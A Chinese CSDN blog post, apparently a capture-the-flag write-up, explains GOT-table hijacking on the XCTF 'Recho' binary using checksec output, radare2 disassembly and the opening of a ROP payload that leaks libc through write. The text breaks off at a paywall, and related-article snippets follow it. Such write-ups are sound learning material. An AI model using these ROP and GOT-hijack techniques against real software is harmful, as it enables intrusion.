【pwn学习】GOT表劫持

最新推荐文章于 2024-02-23 14:43:20 发布
最新推荐文章于 2024-02-23 14:43:20 发布
阅读量4k 收藏 15
点赞数 1
分类专栏: pwn学习 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Morphy_Amo/article/details/121956338
版权
本文介绍了如何利用GOT表劫持技术在XCTF-008-Recho例题中获取shell。通过分析函数行为,找到溢出点,利用write泄露libc地址,然后通过GOT表劫持获取syscall,并构造payload实现open-read-write操作,最终成功读取flag文件内容。
摘要由CSDN通过智能技术生成

文章目录

例题

例题:XCTF-008-Recho

  1. 查看安全策略
root@kali:~/ctf/xctf/pwn# checksec 008_Recho 
[*] '/root/ctf/xctf/pwn/008_Recho'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

  1. 查看函数和字符串

    [0x00400630]> afl
0x00400630    1 43           entry0
0x00400660    4 50   -> 41   sym.deregister_tm_clones
0x004006a0    4 58   -> 55   sym.register_tm_clones
0x004006e0    3 28           entry.fini0
0x00400700    4 38   -> 35   entry.init0
0x004008b0    1 2            sym.__libc_csu_fini
0x004008b4    1 9            sym._fini
0x00400840    4 101          sym.__libc_csu_init
0x00400791    6 164          main
0x00400726    1 107          sym.Init
0x00400610    1 6            sym.imp.setvbuf
0x004005f0    1 6            sym.imp.alarm
0x004005a0    3 23           sym._init
0x004005d0    1 6            sym.imp.write
0x004005e0    1 6            sym.imp.printf
0x00400600    1 6            sym.imp.read
0x00400620    1 6            sym.imp.atoi

[0x00400630]> iz
[Strings]                                                                                                                                                                      
Num Paddr      Vaddr      Len Size Section  Type  String                                                                                                                       
000 0x000008c4 0x004008c4  25  26 (.rodata) ascii Welcome to Recho server!\n                                                                                                   
000 0x00001058 0x00601058   4   5 (.data) ascii flag

    木有发现/bin/sh字符串,但是有个flag字符串,没有system函数。

    • write: 可以用来泄露libc地址
    • sym.__libc_csu_init:万能gadget
    • read:存入的内存空间小于读入大小时,发生溢出

  2. 寻找溢出点

    ​ 直接寻找,未发现溢出点,但是通过调试main可以发现。读入的第一个字符串将经过atoi()转化为整形,而这个结果将作为第二个read函数读取的长度限制。因此用户可以通过第一次的输入一个长度很大的数,再使用第二个read造成溢出。

    |      :|   0x004007c2      e859feffff     call sym.imp.atoi
|      :|   0x004007c7      8945fc         mov dword [var_4h], eax
|      :|   0x004007ca      837dfc0f       cmp dword [var_4h], 0xf
|     ,===< 0x004007ce      7f07           jg 0x4007d7
|     |:|   0x004007d0      c745fc100000.  mov dword [var_4h], 0x10    ; 16
|     |:|   ; CODE XREF from main @ 0x4007ce
|     `---> 0x004007d7      8b45fc         mov eax, dword [var_4h]
|      :|   0x004007da      4863d0         movsxd rdx, eax
|      :|   0x004007dd      488d45d0       lea rax, qword [var_30h]
|      :|   0x004007e1      4889c6         mov rsi, rax
|      :|   0x004007e4      bf00000000     mov edi, 0
|      :|   0x004007e9      e812feffff     call sym.imp.read

  3. Payload

    ​ 有/bin/sh,没有system,尝试利用write泄露libc,payload有三个参数,需要用到rdi,rsi,rdx三个寄存器。

    payload = b'a' * (0x30 + 0x8)
payload += p64(pop_rdi) + p64(0x1)
payload += p64(pop_rsi) + p64(write_got)
payload += p64(pop_rdx) + p64(0x8
最低0.47元/天 解锁文章
Morphy_Amo
关注
专栏目录
变量是什么_GOT劫持PWN
weixin_39628247的博客
12-08 546
声明:由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,知微安全以及文章作者不为此承担任何责任。知微安全拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经知微安全允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。上次介绍IO FILE的pwn题目时,提到exit函数中,会调用标准...
pwn(三)
小明的小书包Ya
10-04 2441
pwn(三) 简单的溢出利用方法 程序没有开启任何保护 方法一:寻找程序中system的函数,再布局栈空间,最后成功调用system('/bin/sh') 方法二:将我们的shellcode写入bss段,然后用elf.bss()来获取bss段地址,从而程序流向到我们的shellcode 这里不用具体程序分析了,把payload分别写上 方法一:payload = 'a' * offset...
Pwn_11 Got 劫持
weixin_30822451的博客
03-08 439
比如说 把puts(str)的.got.plt的地址的值改为system函数地址 格式化字符串的综合利用 可以使用任意地址读取,获取当前函数的实际地址,从而可以获得libc的基地址 利用libc基地址+偏移地址 可以知道其他函数地址 利用任意地址写入,从而配合got hijacking更改已有函数地址   from pwn import *r = remote('127.0....
[NTUSTISC pwn LAB 4]gothijacking
qq_44867432的博客
12-19 470
[NTUSTISC pwn LAB 4]gothijacking 1、检查保护 开启了Canary栈溢出保护,同时有可读可写可执行的段,got可写入。 2、程序分析 (1)静态分析 一般带canary的栈保护措施都会向栈中写入一串随机数,然后执行完某个步骤进行随机数比对,若相同则继续执行,若不同则退出程序。通过观察反汇编代码,输出what’s your name后需要向name所在地址中输入0x40长度的数据。name在bss段的长度为:0xBF-0X80+1=64。通过检查保护措施看到有RWX的段,是
PWN · 格式化字符串|劫持GOT】[watevrCTF 2019]Voting Machine 2]
Mr_Fmnwon的博客
01-18 547
和以往不同的是,格式化字符产参数没有对齐,有两个字节的偏移需要自己填充或者交给fmtstr_payload的参数进行构造。可以通过后门函数获得flag或者getshell获得flag存在两个字节的偏移,fmtstr_payload的各个参数含义要好好掌握。
open和closed_劫持got绕过disable_functions
weixin_39559559的博客
11-24 785
最近阅读了芝士狍子糕师傅写的针对宝塔的RASP及其disable_functions的绕过的文章。觉得其中劫持got来绕过disable_functions的方法还是比较有意思的,对于web手来说也是比较好理解的。这里通过web手的视角来理解这种绕过disable_functions的方法。前置知识/proc目录Linux系统上的/proc目录是一种文件系统,即proc文件系统。/pr...
PWN入门学习
qq_20254219的博客
10-20 2501
基础PWN知识入门 二进制基础 ​ 从C源代码到可执行文件的生成过程 ​ 可执行文件广义上的可执行文件,文件本身是没有执行权限的,和用户权限无关。可以通过命令给文件赋权。 ELF的执行​ 需要将在磁盘上的程序载入内存中。 在磁盘中的是节,映射到内存就是段。 在执行过程中,存储在磁盘中具有相同权限的节会被映射到内存中合成一个段。进程虚拟地址空间​ 操作系统管理所有硬件,程序
VNCTF2022_Pwn_clear_got_WP
weixin_56434818的博客
02-14 866
VNCTF2022_Pwn_clear_got_WP 文章目录VNCTF2022_Pwn_clear_got_WP检查文件IDA查看题给elf文件利用思路exp 检查文件 RELRO半开,没有canary,开NX,没开PIE。 IDA查看题给elf文件 int __cdecl main(int argc, const char **argv, const char **envp) { char buf[92]; // [rsp+0h] [rbp-60h] BYREF int v5; // [rsp
PWN学习
csdn159357258456的博客
03-24 383
在程序运行过程中,堆可以提供动态分配的内存,允许程序申请大小未知的内存。堆其实就是程序虚拟地址空间的一块连续的线性区域,它由低地址向高地址方向增长。我们一般称管理堆的那部分程序为堆管理器。响应用户的申请内存请求,向操作系统申请内存,然后将其返回给用户程序。同时,为了保持内存管理的高效性,内核一般都会预先分配很大的一块连续的内存,然后让堆管理器通过某种算法管理这块内存。只有当出现了堆空间不足的情况,堆管理器才会再次与操作系统进行交互。管理用户所释放的内存。
pwn学习笔记 BUU
2301_79525044的博客
01-11 562
本来配完20和22以后以为自己已经会配基本的环境了,结果18又让我看到了很多新的问题。搜出来的文章大部分都没用,找到有用的文章也忘记保存了,以后如果有缘要重新配环境应该会吃很多亏。之前一直没有做笔记,现在开始正式进入寒假学习。这Ubuntu18的问题比20和22多好多,不停的报错,报错方式不停地变,已经麻了。刚回家,一堆事要搞,没学什么,主要还是配环境。
从c语言到汇编指令 长亭科技,从0开始CTF-PWN(四)ROP绕过栈可执行保护与GOT劫持...
weixin_34440860的博客
05-21 349
int main(int argc, char* argv[]) {char buf[128];if (argc < 2) return 1;strcpy(buf, argv[1]);printf("Input:%sn", buf);return 0;}使用如下命令进行编译:gcc-4.8 -g -m32 -O0 -fno-stack-protector -o pwn_test_bof3_3...
pwn练习题
最新发布
WuMing_Z的博客
02-23 1162
程序分析:main函数中只存在system("/bin/sh")函数,所以nc可直接拿到权限)nc指令:远程连接对方服务器,对方服务器有什么程序就会执行什么程序nc(ip + 端口号)例如在已给的靶机信息node5.buuoj.cn:29650中node5.buuoj.cn是域名,冒号后的29650是端口号(注意冒号要改为空格)然后直接cat flag 即可。
PLT/GOT在ctf pwn题目中的理解与运用 结合CSAPPchap7
weixin_46521144的博客
04-01 1400
由于之前没学过CSAPP第七章的时候,做pwn题时许多概念比如PLTGOT,.BSS段这些概念都不很清楚,按照学长的方法照猫画虎也算是能做出来。如今学习的时候是带着当时的问题学完了这一章。因此做一个小总结,主要是对本章和pwn中关联度较大的部分做一个说明。 网上讲到和GOThijack相关的题目时,大多是推荐阅读CSAPP和连接相关的章节。如果你翻到了这篇文章,那你也就不用再学习原著了 ????当然,如果像更深入的了解,还是推荐CSAPP的。因为毕竟不能面面俱到,并且或许也会有理解错的地方。 理解
[BUUCTF]PWN——wustctf2020_name_your_dog(越界修改got
mcmuyanga的博客
03-18 482
wustctf2020_name_your_dog 例行检查,32位程序,开启了canary和nx 本地试运行一下看看大概的情况 32位ida载入,检索字符的时候发现了后门函数,shell_addr=0x80485cb 主要函数,感觉跟cat那题差不多 漏洞函数 ...
缓冲区溢出基础实践(二)——ROP 与 hijack GOT
weixin_34015336的博客
06-11 735
3.ROP    ROP 即 Return Oritented Programming ,其主要思想是在栈缓冲区溢出的基础上,通过程序和库函数中已有的小片段(gadgets)构造一组串联的指令序列,形成攻击所需要的 shellcode 来实现攻击效果。这种方式不需要注入新的指令到漏洞程序就可以改变某些寄存器或者变量的值,从而改变程序的执行流程。   攻击者可以通过工具对目标程序搜索,寻找所需要...
栈溢出攻击c语言_从0开始CTFPWN(四)ROP绕过栈可执行保护与GOT劫持
weixin_30219823的博客
01-04 755
本文为看雪论优秀文章看雪论坛作者ID:dxbaicai一、教程说明1.1 历史回顾第一节我们介绍了基础环境准备:从0开始CTF-PWN(一)——基础环境准备第二节我们介绍了栈溢出的入门:从0开始CTF-PWN(二)从PWN的HelloWorld-栈溢出开始第三节我们介绍了自行构造shellcode:从0开始CTF-PWN(三)没有system怎么办?构造你的shellcode1.2 本节...
2.pwn-分析外部函数的调用过程分析。(plt和got
admin的博客
09-27 343
一、使用的工具:gdb和pwngdb。 先下载gdb,在下载pwngdb 二、基础知识 .got GOT(Global Offset Table)全局偏移。这是「链接器」为「外部符号」填充的实际偏移。 .plt PLT(Procedure Linkage Table)程序链接。它有两个功能,要么在 .got.plt 节中拿到地址,并跳转。要么当 .got.plt 没有所需地址的时,触发「链接器」去找到所需地址 三、编写测试程序。 我们以一个c语言调用外部的puts函数的程序为..
Pwn 学习 plt和got
MrTreebook的博客
04-24 751
目录1.简介plt和gotpltGOT2.保护机制3.执行顺序 1.简介plt和got plt PLT : 程序链接(PLT,Procedure Link Table) GOT GOT : 全局偏移GOT, Global Offset Table) 此处不对概念做解释了 可以点击查看大佬的介绍 在此我以初学者的角度认识plt和got 点击跳转 点击跳转 2.保护机制 开启RELRO 在前面描述的漏洞攻击中曾多次引入了GOT覆盖方法,GOT覆盖之所以能成功是因为默认编译的应用程序的重定
CTF刷题笔记:whitegive_pwn漏洞分析与plt/got利用
GOT在动态链接中起到关键作用,存储着函数地址的偏移量,攻击者通过溢出导致栈帧中的返回地址(EIP或RBP)被覆盖,从而间接获取到GOT中的函数地址,进一步可以找到如puts或printf等系统调用的地址,以便执行控制...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Morphy_Amo

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值